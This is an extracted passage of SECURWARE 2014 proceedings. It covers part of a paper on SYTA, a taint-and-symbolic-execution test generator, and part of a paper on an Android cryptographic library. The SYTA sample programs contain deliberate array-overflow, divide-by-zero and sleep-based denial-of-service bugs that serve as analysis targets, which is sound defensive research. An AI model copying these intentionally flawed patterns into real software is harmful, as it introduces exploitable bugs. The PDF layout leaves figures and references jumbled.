finds both paths are feasible. The true branch would be
executed first and line 6 is reached. At this time, the index of
the current basic block is 3, and there are not matching pairs
in the IFT list. The destination operand of the statement, the
left-value j, would be added into IFT list together with its
ipdom BB5 in the form of <j, BB5>. All these two pairs will
be removed when line 11 is reached because BB5 matches
either of them.
C. Explicit Information Flow Taint Propagation
Explicit information flow taint propagation is quite
straightforward compared with the implicit one. Only direct
data dependence, such as assignment operations, needs to be
BB0
Note: BB5 is a dummy basic
block, which does not
perform any operation. It is
introduced for the ease of
analysis.
BB1
a[0] = 1;
a[1] = 3;
a[2] = 5;
a[3] = 2;
BB4
j = 0;
BB3
j = 5;
BB5
BB11
if( j <= 3 )
BB6
tmp = 1;
if(j != i)
BB7
tmp = 0;
BB8
If(tmp == 1)
BB9
k = j;
(a)
BB10
j = j + 1;
BB12
p = a+k;
*p = *p – 1;
t = a[*p]-1;
t = x/t;
sleep(t*10000);
BB1
(b)
Figure 3. The source code and CFG of a sample program under testing
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
140
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
1: void foo (unsigned int i)
2:
{
3:
unsigned int j;
4:
long z;
5:
if(i>=4){
6:
j = 5;
7:
}
8:
else {
9:
j = 0;
10:
}
11:
z = j;
12:
}
entry
exit
BB2
if(i >= 4)
BB5
BB3
j = 5;
BB4
j = 0;
BB5
z = j;
BB2
BB3
BB4
entry
exit
(a)
(b)
(c)
Figure 4. A fragment of the sample program in Figure 3 and its CFG, post-dominate tree
considered in taint propagation.
When an assignment statement is encountered, SYTA
will check whether the operands on the right side of the
statement are included in the EFT list. If the answer is
positive, SYTA will insert the left operand into the EFT list.
In addition, when new pairs are added into the IFT list,
the corresponding variables of the pairs should meanwhile
be inserted into the EFT list too. This approach is adopted
because the information flow among variables maybe
proceeds alternately between the two forms. This is a
generally ignored problem. Let’s still take the case in Figure
4 as an example, in the program, there is no explicit
information flow from variable i, exists only an implicit
information flow from variable i to variable j caused by the
if-then-else clause. But the information flow from j to
variable z in line 11 is explicit. If the two kinds of
information flows are processed separately, then in line 11,
the variable z will not be tainted because the variable j is
only tainted with implicit information flow. As a result, no
taint markings will the variable z has, which leads to false
negatives because the value of variable z is influenced by
variable i.
D. Test Case Generation
In KLEE, the context of constraints solving only
contains path conditions. In order to capture the implicit
information flows, the indirect equivalence relationships
between variables are also identified by SYTA and sent to
the SMT solver as asserts. Take the program in Figure 3 as
an example, there exists an implicit equivalence relationship
between k and j (i.e., k == j) after executing line 24. When
the branch condition is not satisfied in line 20, both the
relationships j == i and k == j will hold after line 24. SYTA
will record both equivalent variables pairs in the ER list
rather than only one explicit pair (i.e., j == i).
When a security sink is encountered, two kinds of asserts
will be sent to the SMT solver as the context. One is the path
condition of the current path, the other is a Conjunctive
Normal Form (CNF) formed with pairs in the ER list. As
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
illustrated in the CFG in Figure 3(b), which is expressed in
the intermediate language, when the execution path is ( BB0
BB1 BB4 BB5 BB11 BB6 BB8 BB9
BB10 BB11 BB12), the current security sink is a
reference to array a. At this time, the path condition is (i İ
3 && jİ 3 && j == i && tmp == 1 && j(1)ı 3); the
assert drawn from the ER list is ( k == i ), j(1) is an alias of
variable j. All these expressions are set to be asserts of the
SMT solver. The query submitted is (*p ı 0 &&*p İ 3).
The counterexamples the SMT solver provides are (i = 2; j =
2; *p = 4 ). The test case is ( i = 2 ).
Three kinds of bugs are considered in SYTA: (1) array
bound overflow, (2) divide-by-zero, and (3) denial-ofservice.
(1) If the index variable is marked as tainted in a
reference to an array, a query is constructed as ( index >= 0
&& index <= upperbound – 1 ) and be sent to the SMT
solver. Under certain contexts, there exists an array bound
overflow if all the constraints are satisfied and the query is
not.
(2) If the operator is a divisor, and the divisor m is
tainted. Then the sink query ( m != 0 ) is constructed and
sent to the SMT solver together with all the asserts gathered
till now. Divide-by-zero is found if all the constraints are
satisfied and the query is not.
(3) When the function sleep is called, and its parameter
is marked as tainted, then the query ( sleep <= 10000 ) is
constructed and sent to the SMT solver together with all the
asserts. Then the DoS bug exists if all the constraints are
satisfied and the query is not.
In a word, when SYTA encounters a security sink, it will
gather all the path conditions preceding the current statement
and asserts from ER list, the query will be sent to the SMT
solver. If the query is unsatisfied, a test case is generated and
reported with the bug name.
Based on the above discussion, as shown in Table I,
three test cases are generated to detect bugs in the sample
program in Figure 3. They can be used to trigger the array
bound overflow, divide-by-zero and DoS bugs, respectively.
141
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
TABLE I. TEST CASES OF THE SAMPLE PROGRAM BY SYTA
Tainted
Variables
j = 2;
*p = 4;
Taint Sources
i = 2;
i = 3;
j = 3;
*p = 1;
t = 0;
j = 1;
*p = 2;
t = 25;
i = 1;
Vulnerability
Type
array bound
overflow
divide-by-zero
dinal-of-service
E. Implementation
As shown in Figure 2, we employ GCC 4.5.0 as the
compiler front-end of SYTA. Source code will be parsed
and convert to GIMPLE intermediate representation; its
CFGs are also built by leveraging GCC. SYTA is
implemented as a pass of GCC, analysis will be performed
at the GIMPLE level. Finally, we choose the commonly
used constraints solver STP [16] as the SMT solver in
SYTA.
IV.
EVALUATION
We illustrate two cases that show how SYTA can detect
errors. In the program shown in Figure 5, the control
dependence relationships are based on the switch-case
structure. During analysis, we leverage the GIMPLE
intermediate representation of GCC to process the switchcase structure. In GIMPLE, a switch-case will be regarded
as a normal if-else structure. When the original taint source
is variable n, a counterexample (n = 245) can be got and the
void foo(int n)
{
Unsigned int y[256];
Unsigned int x[256];
for(int i=0; i<256; i++)
{
y[i] = (char)i;
}
void foo(int h)
{
int a[5] = {1,2,3,4,5};
int l = 10;
int k = 0;
if(h < 0){
l = 0;
}
while(l != 0){
if(l <= 5){
k++;
}
l--;
}
l = a[k];
}
Figure 6. The second case study
assignment statement (n = y[n] / x[n-1]; ) may trigger a
divide-by-zero bug.
In the program shown in Figure 6, there is no explicit
else branch in the if (h < 0) statement. In order to capture the
taint propagation through the missing else branch, an
assisting else branch is inserted into the intermediate
representation, which includes a dummy statement (l = l).
Using the dummy statement, a counterexample (h = 2)
would be found as the test case for the array bound overflow
bug at the last statement.
In this paper, we try to extend the test case generation
technique to cover implicit information flows rather than
only explicit information flows. In theory, it is impossible to
track and analyze all forms of implicit information flows.
Our study shows that some typical forms of implicit
information flows can be effectively tracked to support test
case generation. In this section, we employ two proof-ofprinciple samples to demonstrate the ability of SYTA to
track typical forms of implicit information flows. We also
use KLEE (with LLVM v2.7) to analyze the two samples
and the program shown in Figure 3(a). Compared with
SYTA, KLEE, as shown in Figure 7, only provides two test
cases (i.e., i = 1 and i = 2147483648) for feasible execution
paths of the program shown in Figure 3(a), but these cases
can not trigger and report the array-bound-overflow and
divide-by-zero vulnerabilities. Nevertheless, frankly
for(int j=0; j<n; j++)
{
switch(y[j])
{
case 0:
x[j] = 13;
break;
case 1:
x[j] = 14;
break;
case 2:
x[j] = 15;
break;
……
case 256:
x[j] = 12;
break;
}
}
n = y[n]/x[n-1];
}
Figure 5. The first case study
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Figure 7. The KLEE analysis result for the program in Figure 3(a)
142
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
speaking, analyzing a large scale real-work system will
require much more computing overhead.
V.
RELATED WORK
Even though early attention and definition of implicit
information flow dated back to 1970’s, no effective solution
has been found. Lots of newly-developed tools, like
TaintScope [6], detour the implicit information flow
problem and limit their applications only to explicit
information flows. Some other work limits the processing
of control dependence to predetermined forms, for example,
Heng Yin et al. deal with the API function containing
control dependence specially in their tool Panorama [11];
The system designed by Wei Xu et al. [12] process only
two specific kinds of control flow; Dongseok Jang et al. [13]
only process the branching but not the whole program
leading to low coverage and false negatives.
Some dynamic analysis testing tools are more
comprehensive, like Dytan [10] by James Clause, it can
construct implicit information flow on the binary code but
cannot get the control dependence information from indirect
jump instructions. In DTA++ developed by Min Gyung
Kang et al., information preserving implicit information
flows are traced [14], but the simple dichotomy approach is
too rough and may cause under-tainting problem.
VI.
CONCLUSION AND FUTURE WORK
We presented a static analysis tool, SYTA, capable of
automatically generating test cases using symbolic execution
and taint analysis techniques. Using the control flow graph
of the target program and user-appointed taint sources as
inputs, SYTA follows execution paths to track the
constraints on symbolic variables, and maintains two taints
lists for explicit and implicit information flows respectively.
The test cases will be generated from possible
counterexamples in a constraint solving process. Compared
with traditional static analysis tools, SYTA can track
implicit information flows, generates test cases by control
dependence analysis effectively.
At present, in tracking implicit information flows, SYTA
cover only three kinds of sink points, concerning array
bound overflow, divide-by-zero, and denial-of-service,
respectively. By expending taint source points and sink
points, it may cover other kinds of vulnerabilities related to
taint data. For example, by regarding untrusted input
interface functions as taint source points and function
memcpy and the like as sink points, it can detect buffer
overflow vulnerability led to by ineffective input validation.
Science Foundation of Beijing (4122041), the National
Science and Technology Major Project of China
(2012ZX01039-004), and the National High Technology
Research and Development Program of China
(2012AA012903).
REFERENCES
[1]
[2]
[3]
[4]
[5]
[6]
[7]
[8]
[9]
[10]
[11]
[12]
[13]
[14]
ACKNOWLEDGMENT
[15]
The authors would like to thank the anonymous
reviewers for their insightful comments that helped improve
the presentation of this paper. The work has been supported
in part by the National Natural Science Foundation of China
(61070192, 61170240, 61272493, 61100047), the Natural
[16]
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
D. Bird and C. Munoz, “Automatic Generation of Random SelfChecking Test Cases,” IBM Systems Journal, Vol. 22, No. 3, 1983,
pp. 229-245.
Protos, Web page: http://www.ee.oulu.fi/research/ouspg/protos/,
[retrieved: August, 2014].
J. Offutt and J. Hayes, “A Semantic Model of Program Faults,” in
Proceedings of ISSTA’96 (International Symposium on Software
Testing and Analysis), San Diego, January 1996, pp. 195-200.
E. J. Schwartz, T. Avgerinos, and D. Brumley, “All you ever
wanted to know about dynamic taint analysis and forward symbolic
execution (but might have been afraid to ask),” in Proceedings of the
IEEE Symposium on Security and Privacy, May 2010, pp. 317-331.
D. E. Denning and P. J. Denning, “Certification of programs for
secure information flow,” Comm. of the ACM, vol. 20, no. 7, July
1977, pp. 504-513.
T. Wang, T. Wei, G. Gu, and W. Zou, “TaintScope: A checksumaware directed fuzzing tool for automatic software vulnerability
detection,” in Proceedings of the 31st IEEE Symposium on Security
and Privacy, Oakland, California, USA, May 2010, pp. 497-512.
L. Cavallaro, P. Saxena, and R. Sekar, Anti-taint-analysis: Practical
evasion techniques against information flow based malware defense.
Technical report, Stony Brook University, 2007.
C. Cadar, D. Dunbar, and D. Engler, “Klee: Unassisted and
automatic generation of high-coverage tests for complex systems
programs,” in Proceedings of the USENIX Symposium on Operating
System Design and Implementation, 2008, pp. 209-224.
C. Cadar, V. Ganesh, P. Pawlowski, D. Dill, and D. Engler, “EXE: A
system for automatically generating inputs of death using symbolic
execution,” in Proceedings of the ACM Conference on Computer and
Communications Security, October 2006, pp.322-335.
J. Clause, W. Li, and A. Orso, “Dytan: a generic dynamic taint
analysis framework,” in International Symposium on Software
Testing and Analysis, 2007, pp. 196-206.
H. Yin, D. Song, M. Egele, C. Kruegel, and E. Kirda, “Panorama:
Capturing system-wide information flow for malware detection and
analysis,” in Proceedings of the ACM Conference on Computer and
Communications Security, October 2007, pp. 116-127.
W. Xu, E. Bhatkar, and R. Sekar, “Taint-enhanced policy
enforcement: A practical approach to defeat a wide range of attacks,”
in Proceedings of the USENIX Security Symposium, 2006, pp. 121136.
D. Jang, R. Jhala, S. Lerner, and H. Shacham, “An empirical study
of privacy-violating information flows in JavaScript web
applications,” in Proceedings of the ACM Conference on Computer
and Communications Security, 2010, pp. 270-283.
J. Clause, W. Li, and A. Orso, “Dytan: a generic dynamic taint
analysis framework,” in International Symposium on Software
Testing and Analysis, 2007, pp. 196-206.
M. G. Kang, S. McCamant, P. Poosankam, and D. Song, “DTA++:
Dynamic Taint Analysis with Targeted Control-Flow Propagation,”
in Proceedings of the Network and Distributed System Security
Symposium, February 2011, pp. 205-219.
V. Ganesh and D. L. Dill, “A decision procedure for bit-vectors and
arrays,” in Proceedings of the 19th International Conference on
Computer
Aided
Verification,
2007,
pp.
519-531.
143
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Implementation Issues in the Construction of Standard and Non-Standard
Cryptography on Android Devices
Alexandre Melo Braga, Eduardo Moraes de Morais
Centro de Pesquisa e Desenvolvimento em Telecomunicações (Fundação CPqD)
Campinas, São Paulo, Brazil
{ambraga,emorais}@cpqd.com.br
Abstract—This paper describes both the design decisions and
implementation issues concerning the construction of a
cryptographic library for Android Devices. Four aspects of the
implementation were discussed in this paper: selection of
cryptographic primitives, architecture of components,
performance evaluation, and the implementation of nonstandard cryptographic algorithms. The motivation behind the
special attention given to the selection of alternative
cryptographic algorithms was the recently revealed weakness
found in international encryption standards, which may be
intentionally included by foreign intelligence agencies.
such as bilinear pairings and elliptic curves, which are not
fully standardized by foreign organizations, and suffer
constant improvements.
The remaining parts of the text are organized as follows.
Section II offers background on the subject of cryptographic
implementation on Java and Android. Section III details the
implementation aspects. Section IV presents a performance
evaluation and comparison with other libraries. Section V
concludes this text.
Keywords-Cryptography; Surveillance; Security; Android.
This section briefly describes topics of interest: the Java
Cryptographic Architecture (JCA) as a framework for
pluggable cryptography; the Java Virtual Machine (JVM)
with its Garbage Collector (GC) and Just-in-Time (JiT)
compilation; and The Dalvik Virtual Machine (DVM) for
Android.
I.
INTRODUCTION
Currently, the proliferation of smartphones and tablets
and the advent of cloud computing are changing the way
software is being developed and distributed. Additionally,
the use in software systems of cryptographic techniques is
increasing as well.
This paper discusses the construction of a cryptographic
library for Android devices. The paper focuses on design
decisions as well as on implementation issues of both
standard and non-standard algorithms. This work contributes
to the state of the practice by discussing the technical aspects
and challenges of cryptographic implementations. This work
is part of an effort to build security technologies into an
integrated framework for mobile device security [2]. The
evaluation of several cryptographic libraries on Android
devices was reported in a previous work [1], showing that
there is a lack of sophisticated cryptographic primitives, such
as elliptic curves and bilinear pairings. Moreover, the
majority of assessed schemes implements only standard
algorithms, and, as far as authors know, there is no practical
design that concerns alternative, non-standard cryptography.
The motivation behind the special attention given to the
selection of alternative cryptographic algorithms was the
recently revealed weakness, which may be intentionally
included by foreign intelligence agencies in international
encryption standards [16][26]. This fact alone raises doubt
on all standardized algorithms, which are internationally
adopted. In this context, a need arose to treat what has been
called “alternative” or “non-standard” cryptography in
opposition to standardized cryptographic schemes. The final
intent was strengthening the implementation of advanced
cryptography and fostering their use. Non-standard
cryptography provides advanced mathematical concepts,
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
II.
BACKGROUND AND RELATED WORK
A. JCA
The JVM is the runtime software ultimately responsible
for the execution of Java programs. In order to be interpreted
by JVM, Java programs are translated to bytecodes, an
intermediary representation that is neither source code nor
executable. The JCA [17] is a software framework for use
and development of cryptographic primitives in the Java
platform. The JCA defines, among other facilities,
Application Program Interfaces (APIs) for digital signatures
and secure hash functions [17]. On the other hand, APIs for
encryption, key establishment and message authentication
codes (MACs) are defined in the Java Cryptography
Extension (JCE) [19]. Since version 1.4, the JCE was
incorporated by JCA, being treated in practice as a single
framework, named JCA or JCE [20].
The benefit of using a software framework, such as JCA,
is to take advantage of good design decisions, reusing the
whole architecture. The API keeps the same general behavior
regardless of specific implementations. The addition of new
algorithms is facilitated by the use of a standard API [20].
B. GC on JVM
An architectural feature of the JVM has great influence in
the general performance of applications: the GC [35][37].
Applications have different requirements of GC. For some
applications, pauses during garbage collection may be
tolerable, or simply obscured by network latencies, in such a
way that throughput is an important metric of performance.
144
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
However, in others, even short pauses may negatively affect
the user experience.
One of the most advertised advantages of JVM is that it
shields the developer from the complexity of memory
allocation and garbage collection. However, once garbage
collection is a major bottleneck, it is worth understanding
some aspects of its implementation.
The JVM incorporates a number of different GC
algorithms that are combined using generational collection.
While simple GC examines every live object in the heap,
generational collection explores other hypothesis in order to
minimize the work required to reclaim unused objects. The
hypothesis supporting generation GC is corroborated by
observed behavior of applications, where most objects
survive for only a short period of time. Some objects can be
reclaimed soon by memory management, because they have
died shortly after being allocated. For example, iterator
objects are often alive for the duration of a single loop.
On the other hand, some objects do live longer. For
instance, there are typically some objects allocated at
initialization that live until the program terminates. Between
these two extremes are objects that live for the duration of
some intermediate computation. For example, external loop
variables live longer than inner loop variables. Efficient GC
is made possible by focusing on the fact that a majority of
objects die young.
Collections are clearly identified in diagrams, as shown
in Figure 1. The figure shows the time consumed by the first
500 of 10.000 executions of pure-Java implementation of the
AES encryption algorithm.
C. JiT Compilation
Other import consideration on performance of Java
programs is the JiT Compilation [10][35]. Historically, Java
bytecode used to be fully interpreted by the JVM and
presented serious performance issues. Now a days, the
technology known as HotSpot uses JiT Compilation not only
to compile Java programs, but also to optimize them, while
they execute. The result of JiTC is an application that has
portions of its bytecode compiled and optimized for the
targeted hardware, while other portions are still interpreted.
It is interesting to notice that JVM has to execute the
code before to learn how to optimize it. The very first
moments of an application show a relatively poor
performance, since the bytecode is been interpreted,
analyzed for optimizations, and compiled at the same time.
After this short period, the overall performance of the
application improves and the execution tends to stabilize at
an acceptable level of performance. Once again, the period
of optimization and compilation is clearly identified in
diagrams, as is shown in Figure 1.
A feature referred by Oracle as JVM Ergonomics was
introduced in Java 5.0 with the goal of providing good
performance with little or no tuning of configuration options
for JVM. Instead of using fixed defaults, JVM ergonomics
automatically selects GC, heap size, and runtime compiler at
JVM startup. The result of ergonomics is that the choice of a
GC does not matter to most applications. That is, most
applications can perform well under the choices made by
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Figure 1. JiT Optimization of an AES execution.
JVM, even in the presence of pauses of modest frequency
and duration.
Unfortunately, there is a potential negative side to
security in the massive use of JiT Compilation. Security
controls put in place into source code, in order to avoid sidechannels, can be cut off by JiT optimizations. JiTC is not
able to capture programmer's intent that is not explicitly
expressed by Java’s constructs. That is exactly the case of
constant time computations needed to avoid timing attacks.
Security-ware optimizations should be able to preserve
security decisions and not undo protections, when
transforming source code for cryptographic implementations
to machine code. Hence, to achieve higher security against
this kind of attacks, it is not recommended to use JiTC
technology, what constitutes a trade-off between security and
performance.
D. DVM
The DVM [7] is the virtual hardware that executes Java
bytecode in Android. DVM is quite different from the
traditional JVM, so that software developers have to be
aware of those differences, and performance measurements
over a platform independent implementation have to be
taken in both environments.
Compared to JVM, DVM is a relatively young
implementation and did not suffered extensive evaluation. In
fact, the first independent evaluation of DVM was just
recently published [13]. There are three major differences
between DVM and JVM. First of all, DVM is a registerbased machine, while JVM is stack-based. Second, DVM
applies trace-based JiTC, while JVM uses method-based
JiTC. Finally, former DVM implementations use mark-andsweep GC, while current JVM uses generation GC.
Also, results from that DVM evaluation [13] suggest that
current implementations of DVM are slower than current
implementations of JVM. Concerning cryptographic
requirements, a remarkable difference between these two
environments is that the source of entropy in DVM is
significantly different from the one found on JVM.
III.
DESCRIPTION OF THE IMPLEMENTATION
In order to facilitate the portability of the cryptographic
library for mobile devices, in particular for the Android
145
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
platform, the implementation was performed according to
standard cryptographic API for Java, the JCA, its name
conventions, and design principles [14][17]-[20].
Once JCA was defined as the architectural framework,
the next design decision was to choose the algorithms
minimally necessary to a workable cryptographic library.
The current version of this implementation is illustrated by
Figure 2 and presents the cryptographic algorithms and
protocols described in the following paragraphs. The figure
shows that frameworks, components, services and
applications are all on top of JCA API. The Cryptographic
Service Provider (CSP) is in the middle, along with
BouncyCastle and Oracle providers. Arithmetic libraries are
at the bottom.
Figure 2 shows the CSP divided in two distinct
cryptographic libraries. The left side shows only
standardized algorithms and comprises a conventional
cryptographic library. The right side features only nonstandard cryptography and is an alternative library. The
following subsections describe these two libraries.
A. Standard Cryptography
This subsection details the implementation choices for
the standard cryptographic library. The motivations behind
this implementation were all characteristics of standardized
algorithms: interoperability, documentation, and testability.
The standard cryptography is packaged as a pure-Java library
according to the JCA specifications.
The programming language chosen for implementation
of this cryptographic library was Java. The block cipher is
the AES algorithm, which was implemented along with thee
of operation: ECB, and CBC [27], as well as the GCM mode
for authenticated encryption [28]. PKCS#5 [3] is the simplest
padding mechanism and was chosen for compatibility with
other CSPs. As GCM mode for authenticated encryption
only uses AES encryption, the optimization of encryption
received more attention than AES decryption.
Implementation aspects of AES and other cryptographic
algorithms can be found on the literature [15][24][34], in
particular [29].
The asymmetric algorithm is the RSA-PSS that is a
Probabilistic Signature Scheme constructed over the RSA
signature algorithm. PSS is supposed to be more secure than
ordinary RSA [23][34]. Asymmetric encryption is provided
by the RSA-OAEP [23][34].
Two cryptographically secure hashes were implemented,
SHA-1 [22] and MD5. It is well known by now that MD5 is
considered broken and is not to be used in serious
applications, it is present for ease of implementation. In
current version, there is no intended use for these two hashes.
Their primary use will be as the underling hash function in
MACs, digital signatures and PRNGs. The Message
Authentication Codes chosen were the HMAC [25] with
SHA-1 as the underling hash function, and the GMAC [28],
which can be directly derived from GCM mode. SHA-2
family of secure hashes supplies the need for direct use of
single hashes.
The need for a key agreement was fulfilled by the
implementation of Station-to-Station (STS) protocol, which
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Figure 2. Cryptographic Service Provider Architecture.
is based upon Authenticated Diffie-Hellman [38], and
provides mutual key authentication and confirmation [4][39].
Finally, the mechanism for Password-based Encryption
(PBE) is based on the Password-Based Key Derivation
Function 2 (PBKDF2) [3], and provides a simple and secure
way to store keys in encrypted form. In PBE, a keyencryption-key is derived from a password.
B. Non-standard Cryptography
This subsection details the implementation choices for
the alternative cryptographic library. The non-standard
cryptography is a dynamic library written in C and accessible
to Java programs through a Java Native Interface (JNI)
connector, which acts as a bridge to a JCA adapter.
By the time of writing, this alternative library was under
the final steps of its construction. The most advanced
cryptographic protocols currently implemented are based
upon a reference implementation [5] and are listed below.
a) ECDH [8]. The key agreement protocol ECDH is a
variation of the Diffie-Hellman protocol using elliptic
curves as the underlying algebraic structure;
b) ECDSA [21]. This is a DSA-based digital signature
using elliptic curves. ECSS [8] is a variation of ECDSA
that does not require the computation of inverses in the
underlying finite field, obtaining a signature algorithm
with better performance;
c) SOK [8]. This protocol is a key agreement for IdentityBased Encryption (IBE). Sometimes, it is called
SOKAKA for SOK Authenticated Key Agreement;
d) BLS [6]. A short digital signature scheme in which
given a message m, it is computed S = H (m), where S is
a point on an elliptic curve and H() is a secure hash;
e) ZSS [11]. Similar to the previous case, it is a more
efficient short signature, because it utilizes fixed-point
multiplication on an elliptic curve rather arbitrary point;
f) Blake [32]. Cryptographic hash function submitted to
the worldwide contest for selecting the new SHA-3
standard and was ranked among the five finalists;
g) ECIES [8]. This is an asymmetric encryption algorithm
over elliptic curves. This algorithm is non-deterministic
146
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 3. Throughput of implementations.
Figure 4. Performance of AES in pure-Java - average, 9th percentile, and
median of 10.000 iterations.
and can be used as a substitute of the RSA-OAEP, with
the benefit of shorter cryptographic keys;
h) ECSTS [8]. Variation of STS protocol using elliptic
curves and ECDH as a replacement for ADH;
i) Salsa20 [9]. This is a family of 256-bit stream ciphers
submitted to the ECRYPT Project (eSTREAM);
j) Serpent [31]. A 128-bit block cipher designed to be a
candidate to contest that chose the AES. Serpent did not
win, but it was the second finalist and enjoys good
reputation in the cryptographic community.
C. Security decisions for non-standard cryptography
Among the characteristics that were considered in the
choice of alternative cryptographic primitives, side channels
protection was a prevailing factor and had distinguished role
in the design of the library. For instance, schemes with
known issues were avoided, while primitives that were
constructed to resist against such attacks are currently being
regarded for inclusion in the architecture. Furthermore,
constant-time programming techniques, like for example in
table accessing operations for AES, are being surveyed in
order to became part of the implementation.
Concerning mathematical security of non-standard
cryptography, the implementation offers alternatives for 256bit security for both symmetric and asymmetric encryption.
For instance, Serpent-256 corresponds to AES-256 block
cipher, while the same security level is achieved in
asymmetric world using elliptic curves over 521-bit finite
fields, what can only be possible in standard cryptography
using 15360-bit RSA key size. Thus, in higher security
levels, non-standard primitives performance is significantly
improved in relation to standard algorithms, but an extensive
analysis of this scenario, with concrete timing comparisons,
is left as future work.
A final remark about the use of non-standard
cryptography is that working with advanced cryptographic
techniques that have not been sufficiently analyzed by the
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
scientific community has its own challenges and risks. There
are occasions when the design of a non-standard
cryptographic library has to be conservative in order to
preserve security.
For instance, a recent improvement in mathematics
[12][30] had eliminated an entire line of research in
theoretical cryptography. Such advancement affected elliptic
curve cryptography using a special kind of binary curves
called supersingular curves, but had no effect on the bilinear
pairings over primes fields or encryption on ordinary
(common) binary curves. Thus, these two technologies
remain cryptographically secure. Unfortunately, the
compromised curves were in use and had to be eliminated
from the cryptographic library.
As pairings on prime fields can still be securely used in
cryptographic applications, the implementation was adapted
to that new restricted context. Additionally, ordinary elliptic
curves may still be used for cryptographic purposes,
considering they are not supersingular curves, and the
implementation had to adapt to that fact too.
IV.
PERFORMANCE EVALUATION
Performance evaluation of Java programs, either in
standard JVM or DVM/Android, is a stimulating task due to
many sources of interference that can affect measurements.
As discussed in previous sections, GC and JiTC have great
influence over the performance of Java programs. The intent
of performance evaluations presented in this section is to
provide and describe a realistic means to compare
cryptography implementations in Java.
Two approaches of measurement have been used for the
evaluation of cryptographic functions implemented in pureJava programs. The first one was the measurement of
elapsed time for single cryptographic functions processing a
single block of data. This approach suffers from the
interference of GC and JiTC. The JiTC interference can be
eliminated by discarding all the measurements collected
before code optimization. The GC interference cannot be
completely eliminated, though.
147
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 5. Performance evaluation of non-standard cryptography. Digital signatures: signature generation (top-left) and signature verification (topright). Key Agreement: key pair generation (bottom-left), secret-key generation (bottom-right).
Figure 4 exemplifies the first approach and shows the
comparative performance of AES encryption, in ECB mode,
of a single block of data for two Java CSPs: This text CSP
and BouncyCastle (BC) [36]. The measurements were taken
on an LG Nexus 4 with 16GB of internal storage, 2 GB of
RAM, 1.5 GHz Quad-core processor, and Android 4.3. The
procedure consisted of processing a single block of data in a
loop of 10.000 iterations. AES were setup to three key sizes
(128, 192 and 256) in both encryption and decryption.
In order to inhibit the negative influence of GC and JiTC,
three metrics were taken: the average of all iterations, the 9th
percentile and the median. None of them resulted in a perfect
metric. However, these measures do offer a realistic
comparison of CSP and BC. They show similar performance.
The second approach for performance evaluation has to
consider that final users of mobile devices will not tuning
their Java VMs with obscure configuration options in order
to achieve maximum performance. On the contrary, almost
certainly they will use default configurations, with minor
changes on device’s settings. Thus, the responsiveness of an
application tends to be more relevant to final users than the
performance of single operations.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
The second approach of measurement takes into account
the responsiveness of cryptographic services and considers
the velocity with which a huge amount of data can be
processed, despite the interferences of GC and JiTC. The
amount of work performed per unit of time is called the
throughput of the cryptographic implementation.
Figure 3 shows the throughput of four cryptographic
services implemented by CSP compared to BC and JCE:
MD5, SHA-1, HMAC and SHA1PRGN. The measurements
were taken on a smartphone of type Samsung Galaxy S III
(Quad-core 1.4 GHz Cortex-A9 processor, 1GB of RAM,
and Android 4.1). The procedure consisted of processing an
input file of 20 MB, in a loop of 10 iterations. All
cryptographic algorithms were setup with a 128-bit key.
BouncyCastle has a deployment for Android, called
SpongeCastle (SC) [33]. It is interesting to observe that the
three CSPs are quite similar in performance.
The previous paragraphs suggest that the pure-Java
package of CSP, with standard cryptography only, is quite
competitive in performance when compared to other CSP
and its use might not be considered a bottleneck to
applications.
148
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Unfortunately, the case for non-standard cryptography is
not that simple, despite been implemented in C and not been
subjected to GC and JiTC influences. Non-standard
cryptography usually has no standard specifications or safe
reference implementations. Neither it is in broad use by other
cryptographic libraries. Because of that, comparisons among
implementations of the same algorithm are barely possible.
On the other hand, it is feasible to compare alternative and
standard cryptography, considering the same type of service.
For the non-standard cryptography implementations,
performance measurements were taken in three smartphones:
(i) Motorola Atrix with processor of 1 GHz, 1 GB of RAM
and 16GB of storage; (ii) Samsung Galaxy S II with
processor of 1.2 GHz dual-core ARM Cortex-A9, 1 GB of
RAM and 16GB of storage; and (iii) Samsung Galaxy S III
with processor of 1.4 GHz quad-core Cortex-A9, 1 GB of
RAM, and 16 GB of storage.
Figure 5 shows two types of services: digital signatures
at the top and key agreement (KA) at the bottom. The bar
chart at top-left quadrant shows generation of digital
signatures for five algorithms: RSA, ECDSA, ECSS, BLS
and ZSS (BBS). Traditionally, RSA is the slowest one.
Elliptic curve cryptography, as in ECDSA and ECSS, is
faster. Short signatures, such as BLS and ZSS (BBS), are not
as fast as EC.
Bar chart at top-right quadrant shows verification of
digital signatures for five algorithms: RSA, ECDSA, ECSS,
BLS and ZSS (BBS). Traditionally, RSA verification is the
fastest one. Elliptic curve cryptography, as in ECDSA and
ECSS, is not that fast. Short signatures, such as BLS and
ZSS (BBS), are terribly slow, due to complex arithmetic
involved in bilinear pairings computations. The bottom-left
quadrant contains a bar chart showing key pair generation for
ECDSA, ECSS, BLS, and ZSS (BBS). Again, performance
is slow for BLS and ZSS (BBS) due to complex arithmetic
involved in bilinear pairings.
Bar chart in bottom-right quadrant shows operations for
two KA schemes: ECDH and SOK. ECDH is quite fast in
generating parameters (both public and private), as well as in
generating the shared secret. But, pairings based KA
schemes are relatively slow in both operations.
V.
verification is a primary concern and should be taken
seriously, particularly for non-standard cryptography.
Finally, regarding recent global surveillance disclosures,
non-standard cryptographic primitives can be faced as part of
the usual trade-offs that directs the design of
cryptographically secure applications.
ACKNOWLEDGMENT
The authors acknowledge the financial support given to
this work, under the project "Security Technologies for
